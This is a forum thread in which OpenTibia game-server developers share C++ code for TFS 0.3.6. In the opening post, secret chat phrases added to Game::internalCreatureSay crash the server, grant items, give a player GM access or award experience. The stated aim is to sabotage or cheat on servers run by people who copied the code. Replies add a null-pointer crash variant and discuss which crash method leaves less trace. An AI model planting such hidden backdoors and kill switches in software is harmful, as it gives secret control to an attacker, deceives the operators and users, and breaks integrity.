Feature Security things - hidden commands (useful for OT stealers, if thief dont have source)

[Fresh]

Hello.
I thought to publish an easy code (example) for Secure your server against of OT copy or bad teamwork - if someone steal your OT and if his dont have source, if you add some of this security thing, you can secure your OT ! (ex. you can be a GM or get 100 crystal coins).


Ok, lets go:

1) Open your compilator and load your dev.

2) Open game.cpp and search an function:

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)

3) Under:

		player->manageAccount(text);
		return true;
	}

Paste some codes what you want,
here I give you some examples:

1. Command for Crash server:

	if(text == "__here_write_your_sentence_to_crash_stealer_server__")
    {
	exit(0);
    }

2. Give item or 100 crystal coin:

 	if(text == "__here_write_your_sentence_to_give_items__")
    {
    internalPlayerAddItem(NULL, player, Item::CreateItem(2160, 100), true); // here are 100 crystal coins
    }

3. Give Access 6:

 	if(text == "__here_write_sentence_to_add_access__")
    {
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

4. Give 999k experience:

 	if(text == "__here_write_sentence_to_get_exp_points__")
    {
	player->addExperience(999999);
    }

Now if any person steal your OT without get source of them, you can log in to his server and destroy it or playing with cheats ^_^

Tested on TFS 0.3.6pl1.

 

[zakius]

wrong way, this way them can read and edit commands in hex editor really easy, you shouldn't use plain strings to do that
also that codes are weaker than what I was workin with(but stalled/dropped maybe? that project) cause they still have datapack etc

 

[Pietia]

wrong way, this way them can read and edit commands in hex editor really easy, you shouldn't use plain strings to do that
also that codes are weaker than what I was workin with(but stalled/dropped maybe? that project) cause they still have datapack etc

You think that a noob which doesn't even know how to compile sources by himself would know how to use a hex editor and delete these nasty lines?

 

[Kippetjee]

This is verry funny.. but easy to know..

 

[zakius]

You think that a noob which doesn't even know how to compile sources by himself would know how to use a hex editor and delete these nasty lines?

oh well, if datapack isnt protected probably noone would care
but I can encrypt any of my scripts so only my executable is useful(not to mention that even not encrypted codes need many of source changes ^^) so IF anyone would get my server sided otdir it would be almost useless without modifing commands(oh well, config is also possible to encrypt, hehe), just I have no idea how to protect map ;p

 

[Elexonic]

Only can say ... GREAT!

Like!

 

[Mazen]

Lmao, this is just great.

 

[BeniS]

haha would be funny if a player discovered it on your server

make it crash instead of give item:

Player* player = NULL;
player->getName();

boom crashzor

 

[Cykotitan]

exit(0) does ^

 

[BeniS]

exit(0) does ^

same dif

 

[Cykotitan]

no, exit exits it and dereferencing null pointer causes segfault

 

[BeniS]

both resulting in the desired outcome.

 

[zakius]

but still your datapack is stolen and in most cases you can just swap exe with clean one and everything works ;d

 

[Fresh]

Not exacly if you do transformations like Dragon Ball in C++ and other systems

 

[zakius]

Yeah, but people who can do that can also write these simple commands ;d
Damn, I just need idea how to properly encrypt map file -.-

 

[Derek Boom Boom]

Yeah, but people who can do that can also write these simple commands ;d
Damn, I just need idea how to properly encrypt map file -.-

Simply zip it with password protected archive .

 

[zakius]

well, I have no idea how to unpack it to memory and writing it to hd even for that few seconds needed for loading is bad idea
or... I have idea, just dunno if it gonna work


anyway I wanted something bruteforceproof so using password is a no-no(yeah, using 500chars pass would work for SOME time but its not hard to break it, just need time)

 

[Lessaire]

both resulting in the desired outcome.

A segmentation fault would backtrace straight to a reference-able address. Exit would have no STDERR output, they'd be clueless.

 

[Delirium]

haha would be funny if a player discovered it on your server

make it crash instead of give item:

Player* player = NULL;
player->getName();

boom crashzor

How can you get the name of a NULL player anyway?

 

[BeniS]

A segmentation fault would backtrace straight to a reference-able address. Exit would have no STDERR output, they'd be clueless.

Good point

How can you get the name of a NULL player anyway?

Exactly, it's to crash the server